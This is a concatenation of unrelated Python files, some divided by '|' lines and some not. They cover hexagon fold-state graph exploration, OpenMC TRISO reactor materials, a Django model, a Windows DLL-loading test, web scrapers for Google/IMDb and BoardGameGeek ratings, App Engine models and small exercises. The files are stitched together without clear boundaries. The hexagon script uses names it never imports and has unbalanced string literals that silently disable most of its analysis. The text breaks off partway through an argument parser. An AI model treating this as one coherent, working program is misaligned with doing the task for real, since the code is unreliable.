from pylab import rcParams
from networkx.drawing.nx_agraph import to_agraph
import graph_generation
# CONSIDER ROTATION
from sys import maxsize as INT_MAX
from collections import deque
# Maximum number of vertices the global adjacency list can hold.
N = 100200
# gr[i] is the list of neighbours of vertex i; built with a comprehension so
# each vertex gets its own fresh list (replaces the [0]*N + reassignment loop).
gr = [[] for _ in range(N)]
# Function to add edge
def add_edge(x: int, y: int) -> None:
    """Insert an undirected edge between vertices x and y into ``gr``."""
    # Mutating the lists does not rebind ``gr``, so no global statement needed.
    gr[x].append(y)
    gr[y].append(x)
# Function to find the length of
# the shortest cycle in the graph
def shortest_cycle(n: int) -> int:
    """Length in edges of the shortest cycle among vertices 0..n-1, or -1.

    Runs one BFS per source vertex; a non-tree edge encountered between two
    BFS branches yields a candidate cycle of length dist[x] + dist[child] + 1.

    NOTE(review): this function also RESETS the module-level adjacency list
    ``gr`` before returning, so the graph is consumed by the call — confirm
    callers rely on that side effect before changing it.
    """
    # To store length of the shortest cycle
    global gr
    ans = INT_MAX
    # For all vertices
    for i in range(n):
        # Make distance maximum
        dist = [int(1e9)] * n
        # Take a imaginary parent
        par = [-1] * n
        # Distance of source to source is 0
        dist[i] = 0
        q = deque()
        # Push the source element
        q.append(i)
        # Continue until queue is not empty
        while q:
            # Take the first element
            x = q[0]
            q.popleft()
            # Traverse for all it's childs
            for child in gr[x]:
                # If it is not visited yet
                if dist[child] == int(1e9):
                    # Increase distance by 1
                    dist[child] = 1 + dist[x]
                    # Change parent
                    par[child] = x
                    # Push into the queue
                    q.append(child)
                # If it is already visited
                elif par[x] != child and par[child] != x:
                    ans = min(ans, dist[x] +
                              dist[child] + 1)
    # If graph contains no cycle
    #clean gr
    gr = [0] * N
    for i in range(N):
        gr[i] = []
    if ans == INT_MAX:
        return -1
    # If graph contains cycle
    else:
        return ans
from collections import Counter
def countDistinct(arr):
    """Return the number of distinct values in *arr*.

    A set comprehension over hashable elements is simpler and cheaper than
    building a Counter just to count its keys.
    """
    return len(set(arr))
class Hexagon:
    """One fold state of a hexagon under modulo-p angle arithmetic.

    Each instance is a vertex of the exploration graph: it stores the six
    fold angles reduced mod p, the un-reduced "real" angles, and the labels
    of the neighbouring states generated from it.
    """
    neighbor_hexagons: List[Any]

    def __init__(self, p: int, label: int, init_list: list = None, real_list: list = None) -> None:
        """
        :param p: modulus applied to the fold angles
        :param label: integer id of this vertex in the global graph
        :param init_list: six fold angles reduced mod p (defaults to a fresh empty list)
        :param real_list: six un-reduced fold angles (defaults to a fresh empty list)
        """
        self.p = p
        self.label = label
        # Bug fix: the defaults used to be mutable default arguments ([]),
        # which are shared across every instance created without arguments.
        self.fold_angles = [] if init_list is None else init_list
        self.real_angles = [] if real_list is None else real_list
        self.neighbors = []
        self.neighbor_hexagons = []
        self.generated = False

    def neighbor_gen(self):
        """Generate (at most once) all neighbouring fold states of this one.

        Uses the module-level ``vertex_num``, ``vertex_dict`` and ``p``;
        newly discovered states are registered in ``vertex_dict``.
        """
        global vertex_num
        global vertex_dict
        if not self.generated:
            self.generated = True
            for i in range(6):
                if self.fold_angles[i] > 0:
                    d = self.real_angles.copy()
                    i_l = (i - 1) % 6
                    i_r = (i + 1) % 6
                    # Folding at position i: both neighbours absorb twice the
                    # folded angle and the folded angle itself flips sign.
                    d[i_l] = d[i_l] + 2 * d[i]
                    d[i_r] = d[i_r] + 2 * d[i]
                    d[i] = -d[i]
                    c = self.fold_angles.copy()
                    c[i_l] = d[i_l] % self.p
                    c[i_r] = d[i_r] % self.p
                    c[i] = d[i] % self.p
                    # Look for an existing vertex with the same reduced angles.
                    k = [key for key, val in vertex_dict.items() if
                         val.fold_angles == c]  # vertex_dict: {vertex_num: hexagon}
                    if len(k) != 0:
                        if k[0] not in self.neighbors:
                            self.neighbors.append(k[0])  # int
                            self.neighbor_hexagons.append(vertex_dict[k[0]])  # Hexagon
                    else:  # create a new hexagon vertex
                        vertex_num = vertex_num + 1
                        h = Hexagon(p, vertex_num, init_list=c, real_list=d)
                        vertex_dict[vertex_num] = h
                        self.neighbors.append(vertex_num)
                        self.neighbor_hexagons.append(h)
        return self.neighbor_hexagons

    def hexagon_img(self):
        """Render this hexagon's fold angles on a 1x1 hexagonal lattice and save it."""
        g = nx.generators.lattice.hexagonal_lattice_graph(1, 1)
        angle_dict = {i: self.fold_angles[i] for i in range(6)}
        g_1 = nx.relabel_nodes(g, angle_dict)
        nx.draw(g_1)
        plt.savefig("start_point.png")  # save as png
        plt.show()  # display
if __name__ == '__main__':
    # Results are appended to this report file for every run.
    f = open("output2.txt", "a")
    info_list = []
    p_list = [7]
    #desired_list = [129,2,5,7,10,77,20,53,29]
    graph_list = []
    # BFS exploration of the fold-state graph for a single starting point.
    for i in range(1,2):
        vertex_dict = {}
        p = 7 # modulo
        vertex_num = 0
        diG = nx.DiGraph()
        G = nx.Graph()
        sim_G = nx.DiGraph()
        start_list = [0, 1, 0, 0, 1, 0]
        start_list = [k * i for k in start_list]
        start_point = Hexagon(p, vertex_num, start_list, start_list)
        # start_point.hexagon_img()
        vertex_dict[vertex_num] = start_point
        q = Queue()
        q.put(start_point)
        # Breadth-first generation of all reachable fold states.
        while not q.empty():
            t = q.get()
            neighbors_generated = t.neighbor_gen()
            for n in neighbors_generated:
                if not n.generated:
                    q.put(n)
        # Build the directed and undirected graphs from the vertex dictionary.
        for k in vertex_dict:
            """
            if k < 35:
                sim_G.add_node(k)
                for n in vertex_dict[k].neighbors:
                    if 35 > n and n > k:
                        sim_G.add_edge(k, n)
            """
            diG.add_node(k)
            G.add_node(k)
            for n in vertex_dict[k].neighbors:
                assert isinstance(n, int)
                diG.add_edge(k, n)
                if n > k:
                    G.add_edge(k,n)
        #generate gradient map
        # d[k] approximates each vertex's distance from the start vertex by
        # following its lowest-numbered neighbour back towards 0.
        d = {}
        for k in vertex_dict: #nodes index
            if k == 0:
                d[k] = 0
            else:
                #find the nearest neighbor
                n = min(vertex_dict[k].neighbors)
                d[k] = d[n]+1
        """
        for v in d:
            if v in desired_list:
                print("index")
                print(v)
                print("distance")
                print(d[v])
        #H = nx.relabel_nodes(G, vertex_dict)
        low, *_, high = sorted(d.values())
        norm = mpl.colors.Normalize(vmin=low, vmax=high, clip=True)
        mapper = mpl.cm.ScalarMappable(norm=norm, cmap=mpl.cm.coolwarm)
        try:
            nx.draw_planar(G,nodelist=d,
                           node_size=1000,
                           node_color=[mapper.to_rgba(i)
                                       for i in d.values()],
                           with_labels=True,
                           font_color='white') # only works if the graph is planar
        except Exception:
            nx.draw(G,
                    nodelist=d,
                    node_size=1000,
                    node_color=[mapper.to_rgba(i)
                                for i in d.values()],
                    with_labels=True,
                    font_color='white')
        #plt.savefig("gradient_modulo_" + str(p) + ".png") # save as png
        #plt.show()
        # a better way to draw?
        render = to_agraph(sim_G) # this is using graphviz. Graphviz worked better than matplotlib in this case.
        render.layout('twopi') # this is only one of the possible layouts, I will comment on this on WeChat
        # other possible layouts: http://www.adp-gmbh.ch/misc/tools/graphviz/index.html
        render.graph_attr['label'] = "modulo_" + "p_render"
        render.draw('twopi_modulo_{}.png'.format(p))
        #
        # print(G.nodes)
        # print(G.edges)
        # plt.savefig("gradient_modulo_" + str(p) + ".png") # save as png
        A = to_agraph(sim_G)
        A.layout('dot')
        A.draw('dot_multi_'+ str(p)+'.png')
        A = nx.to_numpy_matrix(G)
        #print(A)
        eigvals, eigvecs = la.eig(A)
        eigvals = eigvals.real
        eigvals.sort()
        distinct_eigval_num = countDistinct(eigvals)
        first = eigvals[-1]
        second = eigvals[-2]
        #spec.adjacency_spectrum(G)
        cycle_9_list = []
        girth_dict = {}
        girth_len_dict = {}
        for c in cycles.minimum_cycle_basis(G):
            if len(c) == 9:
                cycle_9_list.append(c)
            if len(c) not in girth_dict.keys():
                girth_dict[len(c)] = c
                girth_len_dict[len(c)] = 1
            else:
                girth_len_dict[len(c)] = girth_len_dict[len(c)] + 1
        print(f"\n for starting point {i}", file=f)
        print(f"girth_len_dict:{girth_len_dict}", file=f)
        print(f"cycle_9_list: {cycle_9_list}", file=f )
        for cycle_9 in cycle_9_list:
            for v in cycle_9:
                print("index:" + str(v), file=f)
                print(f'[!]fold_angles: {vertex_dict[v].fold_angles}', file=f)
                print(f"[@]real_angles:{vertex_dict[v].real_angles}", file=f)
                print(f"neighbors:{vertex_dict[v].neighbors}", file=f)
                print(f"distance:{d[v]}\n", file=f)
        #n = vertex_num + 1
    """
    # NOTE(review): the triple-quoted markers in this file are unbalanced —
    # the rendering/eigenvalue/cycle analysis above sits INSIDE a discarded
    # string literal and never runs, while the section below IS executed.
    cycle_9_list = [[129, 2, 5, 7, 10, 77, 20, 53, 29], [1, 3, 4, 39, 104, 8, 14, 22, 58]]
    distance_iso_dict = {}
    # For each multiplier s, map the hard-coded 9-cycles through the angle
    # isomorphism x -> (x * s) mod 7 and record the distances of the images.
    # (s == 1 seeds distance_iso_dict; later iterations append to it.)
    for s in range(1, 7):
        print(s)
        print(f"\n##########with starting point {s} #######", file=f)
        for cycle_9 in cycle_9_list:
            print(f"cycle: {cycle_9}", file=f)
            for v in cycle_9:
                if s != 1:
                    #do the convert
                    fold_algs = vertex_dict[v].fold_angles
                    iso_fold_algs = [(alg * s) % 7 for alg in fold_algs]
                    #check the related distance
                    for k in vertex_dict:
                        if vertex_dict[k].fold_angles == iso_fold_algs:
                            print("index:" + str(k), file=f)
                            print(f'[!]fold_angles: {vertex_dict[k].fold_angles}', file=f)
                            print(f"[@]real_angles:{vertex_dict[k].real_angles}", file=f)
                            print(f"neighbors:{vertex_dict[k].neighbors}", file=f)
                            print(f"distance:{d[k]}\n", file=f)
                            distance_iso_dict[v].append(d[k])
                else:
                    distance_iso_dict[v] = [d[v]]
                    print("index:" + str(v), file=f)
                    print(f'[!]fold_angles: {vertex_dict[v].fold_angles}', file=f)
                    print(f"[@]real_angles:{vertex_dict[v].real_angles}", file=f)
                    print(f"neighbors:{vertex_dict[v].neighbors}", file=f)
                    print(f"distance:{d[v]}\n", file=f)
    # NOTE(review): the final report loop and f.close() below are inside a
    # string literal, so they never execute and ``f`` is never closed.
    """
    for key in distance_iso_dict:
        print(f"{key}'s distances: {distance_iso_dict[key]}", file=f)
    f.close()
    """
    #print(len(vertex_dict))
    #girth = shortest_cycle(n)/2
    #info = [p, distinct_eigval_num, first, second]
    #info = [p, n, girth_dict, girth_len_dict]
    #info = [p, n, bipartite.is_bipartite(G), distance_measures.diameter(G), girth , first, second]
    #info_list.append(info)
    #f.close()
    #print(tabulate(info_list,headers = ["p","# of dictinct eigenvalues","first","second"]))
    #print(tabulate(info_list, headers=["p", "vertex number", "is bipartite", "diameter", "girth", "largest eigenval", "2nd largest eigenval"]))
    #print(tabulate(info_list, headers=["p", "vertex number", "girth list","girth length dict"]))
import openmc
from numpy import pi
# Constants
# TRISO particle layer radii in cm (presumably kernel through outer coating,
# innermost to outermost) — TODO confirm against the reactor spec.
T_r1 = 2135e-5
T_r2 = 3135e-5
T_r3 = 3485e-5
T_r4 = 3835e-5
T_r5 = 4235e-5
# Axial pitch (cm) used for the z extent of the prisms below.
T_pitch = 0.09266
# Fuel kernel material (uranium oxycarbide, per the variable name).
uoc_9 = openmc.Material()
uoc_9.set_density("g/cc", 11)
uoc_9.add_nuclide("U235", 2.27325e-3)
uoc_9.add_nuclide("U238", 2.269476e-2)
uoc_9.add_nuclide("O16", 3.561871e-2)
uoc_9.add_nuclide("C0", 9.79714e-3)
uoc_9.temperature = 1110
# Total kernel volume: sphere volume times particle/compact multiplicities.
uoc_9.volume = 4 / 3 * pi * (T_r1 ** 3) * 101 * 210 * 4 * 36
# Porous carbon.
por_c = openmc.Material()
por_c.set_density("g/cc", 1)
por_c.add_nuclide("C0", 5.013980e-2)
por_c.temperature = 948
# Silicon carbide.
si_c = openmc.Material()
si_c.set_density("g/cc", 3.2)
si_c.add_nuclide("Si28", 4.431240e-2)
si_c.add_nuclide("Si29", 2.25887e-3)
si_c.add_nuclide("Si30", 1.48990e-3)
si_c.add_nuclide("C0", 4.806117e-2)
si_c.temperature = 948
# Graphite.
graphite = openmc.Material()
graphite.set_density("g/cc", 1.8)
graphite.add_nuclide("C0", 9.025164e-2)
graphite.temperature = 948
# Homogenised mixture standing in for the four TRISO coating layers
# (density computed from the nuclide sum).
triso_4_layers = openmc.Material()
triso_4_layers.add_nuclide("C0", 0.06851594519357823)
triso_4_layers.add_nuclide("Si28", 0.009418744960032735)
triso_4_layers.add_nuclide("Si29", 0.00048013017638108395)
triso_4_layers.add_nuclide("Si30", 0.0003166830980933728)
triso_4_layers.set_density("sum")
triso_4_layers.temperature = 948
# Matrix graphite used as TRISO lattice filler.
lm_graphite = openmc.Material()
lm_graphite.set_density("g/cc", 1.8)
lm_graphite.add_nuclide("C0", 9.025164e-2)
lm_graphite.temperature = 948
# FLiBe molten salt coolant.
flibe = openmc.Material()
flibe.set_density("g/cc", 1.95)
flibe.add_nuclide("Li6", 1.383014e-6)
flibe.add_nuclide("Li7", 2.37132e-2)
flibe.add_nuclide("Be9", 1.18573e-2)
flibe.add_nuclide("F19", 4.74291e-2)
flibe.temperature = 948
mats = openmc.Materials(
    (uoc_9, por_c, si_c, graphite, lm_graphite, flibe, triso_4_layers)
)
# 4 layer triso
# Simplified two-region particle: fuel kernel plus one homogenised shell,
# embedded in matrix graphite.
two_spheres = [openmc.Sphere(r=r) for r in [T_r1, T_r5]]
two_triso_cells = [
    openmc.Cell(fill=uoc_9, region=-two_spheres[0]),
    openmc.Cell(fill=triso_4_layers, region=+two_spheres[0] & -two_spheres[1]),
    openmc.Cell(fill=lm_graphite, region=+two_spheres[1]),
]
two_triso_univ = openmc.Universe(cells=two_triso_cells)
def create_prism(left, right, left_refl, right_refl):
    """Region between two x-planes with fixed y extent and reflective z-planes.

    left_refl / right_refl make the corresponding x boundary reflective.
    """
    left_kwargs = {"boundary_type": "reflective"} if left_refl else {}
    right_kwargs = {"boundary_type": "reflective"} if right_refl else {}
    xplane_left = +openmc.XPlane(x0=left, **left_kwargs)
    xplane_right = -openmc.XPlane(x0=right, **right_kwargs)
    return (
        xplane_left &
        xplane_right &
        +openmc.YPlane(y0=0.35) &
        -openmc.YPlane(y0=0.35 + 2.55) &
        +openmc.ZPlane(z0=0, boundary_type="reflective") &
        -openmc.ZPlane(z0=T_pitch * 20, boundary_type="reflective")
    )
def create_prism_vertical(bot, top):
    """Region between two y-planes with fixed x extent and reflective z-planes."""
    bottom_face = +openmc.YPlane(y0=bot)
    top_face = -openmc.YPlane(y0=top)
    return (
        +openmc.XPlane(x0=2) &
        -openmc.XPlane(x0=2 + 23.1) &
        bottom_face &
        top_face &
        +openmc.ZPlane(z0=0, boundary_type="reflective") &
        -openmc.ZPlane(z0=T_pitch * 20, boundary_type="reflective")
    )
def create_lattice(region, pf):
    """Fill *region* with a packed TRISO lattice at packing fraction *pf*.

    Falls back to a homogeneous lm_graphite cell when sphere packing or
    lattice construction fails (e.g. the region is too small for pf).
    """
    try:
        centers_1 = openmc.model.pack_spheres(radius=T_r5, region=region, pf=pf)
        trisos_1 = [openmc.model.TRISO(T_r5, two_triso_univ, c) for c in centers_1]
        prism = openmc.Cell(region=region)
        lower_left_1, upper_right_1 = prism.region.bounding_box
        # One lattice element per 0.4 cm of the bounding box along each axis.
        shape = tuple(((upper_right_1 - lower_left_1) / 0.4).astype(int))
        pitch_1 = (upper_right_1 - lower_left_1) / shape
        lattice_1 = openmc.model.create_triso_lattice(
            trisos_1, lower_left_1, pitch_1, shape, lm_graphite
        )
        prism.fill = lattice_1
    # Bug fix: a bare `except:` also swallowed SystemExit/KeyboardInterrupt;
    # catch Exception so interrupts still propagate.
    except Exception:
        prism = openmc.Cell(region=region)
        prism.fill = lm_graphite
    return prism
|
# Packaging metadata for the ``modulepickle`` distribution.
# NOTE(review): distutils is deprecated and removed in Python 3.12;
# ``setuptools.setup`` is the drop-in replacement when the floor is raised.
from distutils.core import setup

setup(name='modulepickle',
      version='0.3',
      description='Dynamic module pickler',
      author='Andy Jones',
      author_email='andyjones.ed@gmail.com',
      url='https://github.com/andyljones/modulepickle',
      packages=['modulepickle'])
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
"""
-------------------------------------------------
File Name:io
Author:jason
date:2018/3/15
-------------------------------------------------
Change Activity:2018/3/15:
-------------------------------------------------
"""
import codecs
import os
class IOUtil():
    """Small file I/O helpers for reading and saving tokenised text."""

    @staticmethod
    def load_files(files):
        """Read every file in *files* and return all lines concatenated.

        :param files: list of file paths; falsy entries are skipped
        :return: list of text lines (newlines preserved), in input order
        """
        lines = []
        print(files)
        for path in files:
            if not path:
                continue
            with codecs.open(path, 'rb', encoding='utf-8') as handle:
                lines += handle.readlines()
        return lines

    @staticmethod
    def save_to_file(result_text, save_file):
        """Save tokenised sentences to *save_file*, one token per line.

        Each token's '/' separator is replaced by a tab (word<TAB>tag), and
        a blank line terminates every sentence.
        """
        with codecs.open(save_file, 'w', encoding='utf-8') as handle:
            for sentence in result_text:
                for token in sentence:
                    # tab-separate word and tag when saving
                    handle.write(token.replace('/', '\t') + '\n')
                handle.write('\n')
|
from django.db import models
import datetime
from django.utils import timezone
class Post(models.Model):
    """A blog post: title, body text and publication timestamp."""
    title = models.CharField(max_length=200)
    # NOTE(review): a 2,000,000-char CharField is unusual; TextField is the
    # conventional field for bodies this large -- confirm before migrating.
    content = models.CharField(max_length=2000000)
    pub_date = models.DateTimeField('date published')
    def was_published_recently(self):
        # True when pub_date is within the last 24 hours and not in the future.
        now = timezone.now()
        return now - datetime.timedelta(days=1) <= self.pub_date < now
    def __unicode__(self):
        # Python 2 / old-Django display name (admin lists, shell repr).
        return self.title
'''
Created on Oct 6, 2011
@author: Rob Waaser
'''
import ctypes
import os

# Windows-only experiment (Python 2 syntax): load a DLL through the raw
# kernel32 API and inspect GetLastError after each call.
if __name__ == '__main__':
    print "Running using cdll.libTestDLL...."
    kernel32 = ctypes.windll.kernel32  # kernel32 via the stdcall loader
    print "Running using LoadLibrary"
    name = "libCrash.dll"
    path = os.path.join(os.getcwd(), name)
    # Load explicitly so the returned handle and error code can be examined.
    handle = kernel32.LoadLibraryA(path)
    print "Handle %x" % handle
    error = kernel32.GetLastError()
    print "Load returned error: " + str(error)
    address = kernel32.GetProcAddress(handle, "write")
    print kernel32.GetLastError()
    print "Address: %x" % address
    if error == 0 :
        print "Freeing library handle"
        kernel32.FreeLibrary(handle)
    # The triple-quoted block below is dead scratchpad code; it is a string
    # literal at runtime, so its contents are intentionally left untouched.
    '''
    dll = ctypes.cdll #cdll windll oledll
    print dll.libTestDLL.add_num(2, 2)
    # cdll.kernel32[1]
    # hex(windll.kernel32.GetModuleHandleA(None))
    # all Python types except integers, strings, and unicode strings
    # have to be wrapped in their corresponding ctypes type,
    print "Running using CDLL(\"libTestDLL\")...."
    args = [2, 2]
    print ctypes.cdll.LoadLibrary("libTestDLL")[1](*args)
    print "Running using LoadLibrary"
    name = "libTestDLL.dll"
    path = os.path.join(os.getcwd(), name)
    print "Finding library TestDLL"
    print ctypes.util.find_library("libTestDLL.dll")
    print "Resetting DLL search path...."
    # kernel32.SetDllDirectoryA(None)
    p = ctypes.create_string_buffer(500)
    print kernel32.GetDllDirectoryA(500, ctypes.byref(p))
    print kernel32.GetLastError()
    print repr(p.raw)
    print kernel32.GetWindowsDirectoryA(ctypes.byref(p), 500)
    print kernel32.GetLastError()
    print repr(p.raw)
    print "My current path: " + os.getcwd()
    print "Trying to load dll: " + path
    path = path
    handle = kernel32.LoadLibraryA(path)
    print handle
    error = kernel32.GetLastError()
    print "Load returned error: " + str(error)
    address = kernel32.GetProcAddress(handle, "add_num")
    print kernel32.GetLastError()
    print "Address: %x" % address
    if error == 0 :
        print "Freeing library handle"
        kernel32.FreeLibrary(handle)
    '''
from openerp.osv import fields, osv
class sale_order(osv.osv):
    """Extend sale.order with a free-of-charge (FOC) flag."""
    _inherit = "sale.order"
    _columns = {
        # Checked when the whole sale order is given free of charge.
        'is_foc': fields.boolean('Is a FOC?', default=False, help="Check if the sale order is FOC "),
    }
# class wizard_data_inherit(osv.osv):
# _inherit = "account.invoice"
#
# # _columns = {
# # 'data_wizard':
# # }
#
# def get_data(self, cr, uid, ids, context=None):
# # view_id = self.ref('mutual_reports.wiz_report_select')
# ctx({'ntn': self.NTN})
# return {
# 'name': ('wizard_open'),
# 'view_type': 'form',
# 'view_mode': 'form',
# 'res_model': 'wiz.report.selection',
# 'type': 'ir.actions.act_window',
# 'target': 'new',
# 'context': ctx,
# },
|
# -*- coding: utf-8 -*-
"""
Created on Tue May 5 02:04:57 2020
@author: filiz.aksoy
"""
def factors(a):
    """Return the proper divisors of *a* greater than 1 (excluding *a*).

    Fixes the original, which appended 2 for even numbers but then only
    tested odd candidates from 3 (missing 4, 6, ... for e.g. a=12) and
    excluded a//2 itself from the range (missing 5 for a=10).
    """
    divisors = []
    for candidate in range(2, a // 2 + 1):
        if a % candidate == 0:
            divisors.append(candidate)
    return divisors
|
#Program to find the greatest of 3 given numbers
a = 14
b = 10
c = 3
print("Let's find the greatest of these 3 numbers")
# Rank the three values once and report ties explicitly.  The original
# Python 2 branching was wrong: e.g. for a < b < c it printed BOTH
# 'c is greatest..' and 'b is greatest'.
greatest = max(a, b, c)
if a == b == c:
    print('All are equal')
elif a == greatest and b == greatest:
    print('a and b is greatest')
elif a == greatest and c == greatest:
    print('a and c is greatest')
elif b == greatest and c == greatest:
    print('b and c are greatest')
elif a == greatest:
    print('a is greatest')
elif b == greatest:
    print('b is greatest')
else:
    print('c is greatest')
|
from bs4 import BeautifulSoup
import requests
import sys
from furl import furl
URL = 'https://www.google.com/search'
def getSoup(movie):
    """Google-search "<movie> movie imdb" and return the parsed result page."""
    query = '{0} movie imdb'.format(movie)
    page = requests.get(URL, params={ 'q': query })
    return BeautifulSoup(page.content, 'html5lib')
def getMovieLink(movie):
    """Return the IMDb /reviews URL for *movie*, or '' if none is found.

    Scrapes the Google results page: each hit sits in a ``div.kCrYT`` whose
    anchor href is a Google redirect carrying the real target in its ``q``
    query parameter.  NOTE(review): tied to Google's current markup -- the
    'kCrYT' class name is unstable and may break without warning.
    """
    movieLink = ''
    soup = getSoup(movie)
    searchResults = soup.findAll('div', attrs = { 'class' : 'kCrYT' })
    for searchResult in searchResults:
        link = searchResult.find('a')
        if link:
            link = link.get('href')
            result = furl(link)
            link = result.args['q']  # unwrap the Google redirect target
            linkObj = furl(link)
            if linkObj.host == 'www.imdb.com':
                # Jump straight to the title's reviews page.
                linkObj.path.segments.append('reviews')
                linkObj.path.normalize()
                movieLink = linkObj.url
                break
    return movieLink
if __name__ == '__main__':
    # Exactly one CLI argument (the movie name) is expected.
    if len(sys.argv) == 2:
        print(getMovieLink(sys.argv[-1]))
    else:
        print('The format is python <filename> <movie>')
from bs4 import BeautifulSoup
import requests
import pandas as pd
import json
from requests.compat import urljoin
from datetime import datetime
import re
import asyncio
from asyncio import AbstractEventLoop
import aiohttp
from colorama import Fore
from collections import defaultdict
import bs4
import math
def main():
    """Scrape all BGG user ratings/comments and save them as JSON snapshots."""
    # Create loop
    print(str(datetime.now().time())[:8])  # start timestamp HH:MM:SS
    loop = asyncio.get_event_loop()
    user_rating, user_comment = loop.run_until_complete(get_game_ratings(loop))
    # Persist both result lists next to the input data.
    with open('../data/user_ratings_190508.json', 'w') as fp:
        json.dump(user_rating, fp)
    with open('../data/user_comments_190508.json', 'w') as fp:
        json.dump(user_comment, fp)
async def get_game_ratings(loop: AbstractEventLoop):
    """Download every rating/comment page for the games in
    game_info_190508.json and return (user_rating, user_comment) lists."""
    with open('../data/game_info_190508.json', 'r') as fp:
        games_dict = json.load(fp)
    pg_sz = 100  # ratings returned per XML API page
    xml_bs = f'https://www.boardgamegeek.com/xmlapi2/thing?type=boardgame&ratingcomments=1&pagesize={pg_sz}'
    # (game_id, usersrated) pairs, sorted ascending by rating count.
    ratings_list = [(x['game_id'], x['usersrated']) for x in games_dict]
    ratings_list.sort(key=lambda tup: tup[1], reverse=False)
    group_sz = 50  # games batched into a single multi-id request
    user_rating = []
    user_comment = []
    group_xml = []
    for group_num in range(math.ceil(len(ratings_list) / group_sz)):
        group_ids = ratings_list[group_num * group_sz:(group_num + 1) * group_sz]
        # NOTE(review): the list is ascending, so group_ids[0] is the group's
        # LEAST-rated game; pg_ct may therefore stop short of the pages needed
        # by later games in the same group -- confirm the intended ordering.
        pg_ct = math.ceil(group_ids[0][1] / pg_sz)
        # group_xml[group_num] = []
        for pg_num in range(1, pg_ct + 1):
            # Only request games that still have ratings left on this page.
            xml_ids = ','.join([x[0] for x in group_ids if x[1] > (pg_num - 1) * pg_sz])
            xml_url = f'{xml_bs}&page={pg_num}&id={xml_ids}'
            group_xml.append((loop.create_task(get_xml(xml_url)), pg_num))
        # break
    # Await each page in order and fold it into the result lists.
    for pg_xml, n in group_xml:
        xml = await pg_xml
        user_rating, user_comment = get_pg_ratings(xml, user_rating, user_comment)
        print(f'group {n} at {(str(datetime.now().time())[:8])}', flush=True)
    print(5)
    print(str(datetime.now().time())[:8])
    return user_rating, user_comment
async def get_xml(xml_pg_url):
    """Fetch *xml_pg_url* and return the response body as text.

    Raises aiohttp.ClientResponseError for non-2xx responses.
    """
    connector = aiohttp.TCPConnector(limit_per_host=2)  # be polite to the API
    async with aiohttp.ClientSession(connector=connector) as session:
        async with session.get(xml_pg_url) as resp:
            resp.raise_for_status()
            return await resp.text()
def get_pg_ratings(html: str, user_ratings: list, user_comments: list):
    """Parse one XML page of BGG ratings and append rows to the two lists.

    Returns the same (mutated) user_ratings / user_comments lists so the
    caller can rebind them.
    """
    soup = BeautifulSoup(html, 'xml')
    for item in soup.find_all('item'):
        game_id = item['id']
        # Only element children of <comments> are rating entries.
        tags = [child for child in item.comments.contents
                if type(child) == bs4.element.Tag]
        for tag in tags:
            user_ratings.append({'user': tag['username'],
                                 'rating': float(tag['rating']),
                                 'game_id': game_id})
        for tag in tags:
            # A non-empty value attribute means the user left a comment.
            if tag['value'] != '':
                user_comments.append({'user': tag['username'],
                                      'rating': float(tag['rating']),
                                      'game_id': game_id,
                                      'comment': tag['value']})
    return user_ratings, user_comments
# Script entry point; earlier pipeline stages kept below for reference.
if __name__ == '__main__':
    main()
    # game_items = game_data_async()
    # export_csv(game_items)
    # print(5)
|
#coding=utf-8
from google.appengine.ext import db
class GroupType(db.Model):
    """Category describing a kind of Group (referenced by Group.group_type)."""
    title=db.StringProperty()
    group_type_id=db.IntegerProperty()  # external numeric id
    description=db.StringProperty()
class Group(db.Model):
    """A user group; typed via GroupType and linked to Modules by key list."""
    group_gid=db.StringProperty()       # external string id
    group_id=db.IntegerProperty()       # external numeric id
    title=db.StringProperty()
    description=db.StringProperty()
    mod_dt=db.DateTimeProperty()        # last-modified timestamp
    group_type=db.ReferenceProperty(GroupType)
    group_modules=db.ListProperty(db.Key)  # keys of associated Module entities
    @property
    def users(self):
        # Reverse lookup: all Users whose users_groups list contains this group.
        return User.gql("WHERE users_groups=:1",self.key())
class Module(db.Model):
    """A module (tied to a Google Calendar) that Groups can reference."""
    google_cal_id=db.StringProperty()   # backing Google Calendar id
    module_id=db.IntegerProperty()      # external numeric id
    title=db.StringProperty()
    description=db.StringProperty()
    mod_dt=db.DateTimeProperty()        # last-modified timestamp
    @property
    def groups(self):
        # Reverse lookup: all Groups whose group_modules list contains this module.
        return Group.gql("WHERE group_modules=:1",self.key())
class User(db.Model):
    """An application user; group membership is stored as a list of Group keys."""
    gID=db.StringProperty()             # Google account id
    uID=db.StringProperty()             # application-level string id
    user_id=db.IntegerProperty()        # external numeric id
    name=db.StringProperty()
    mod_dt=db.DateTimeProperty()        # last-modified timestamp
    users_groups=db.ListProperty(db.Key)  # keys of Groups this user belongs to
# @Title: 二叉搜索树节点最小距离 (Minimum Distance Between BST Nodes)
# @Author: 2464512446@qq.com
# @Date: 2020-11-27 16:15:35
# @Runtime: 40 ms
# @Memory: 13.4 MB
# Definition for a binary tree node.
# class TreeNode:
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
class Solution:
    def minDiffInBST(self, root: "TreeNode") -> int:
        """Return the minimum difference between values of any two nodes.

        An in-order traversal of a BST visits values in ascending order, so
        the answer is the smallest gap between consecutive visited values.
        (Annotation quoted and ``math`` imported locally: the original
        referenced both names without them being defined/imported.)
        """
        import math

        self.pre = -math.inf   # value of the previously visited node
        self.res = math.inf    # smallest gap seen so far

        def inorder(node):
            if not node:
                return
            inorder(node.left)
            self.res = min(self.res, node.val - self.pre)
            self.pre = node.val
            inorder(node.right)

        inorder(root)
        return self.res
|
#!/usr/bin/env python
# Standard imports
import argparse
import os
# TopEFT imports
from TopEFT.Generation.Configuration import Configuration
from TopEFT.Generation.Process import Process
from TopEFT.Tools.u_float import u_float
# Logging
import TopEFT.Tools.logger as logger
#find all processes
# Every ``*.dat`` process card in the directory becomes a --process choice
# (file name without extension).
process_path = os.path.expandvars("$CMSSW_BASE/src/TopEFT/Generation/data/processCards")
processes = [os.path.splitext(f)[0] for f in os.listdir(process_path) if os.path.isfile(os.path.join(process_path, f)) and f.endswith('.dat')]
# Argument parser
argParser = argparse.ArgumentParser(description = "Argument parser")
argParser.add_argument('--process', action='store', default='ttZ', choices=processes, help="Which process?")
argParser.add_argument('--model', action='store', default='HEL_UFO', choices=['ewkDM', 'ewkDM2', 'ewkDMGZ', 'HEL_UFO', 'TopEffTh', 'dim6top_LO', 'dim6top_LO_v2'], help="Which madgraph model?")
argParser.add_argument('--couplings', action='store', default=[], nargs='*', type = str, help="Give a list of the non-zero couplings with values, e.g. NAME1 VALUE1 NAME2 VALUE2")
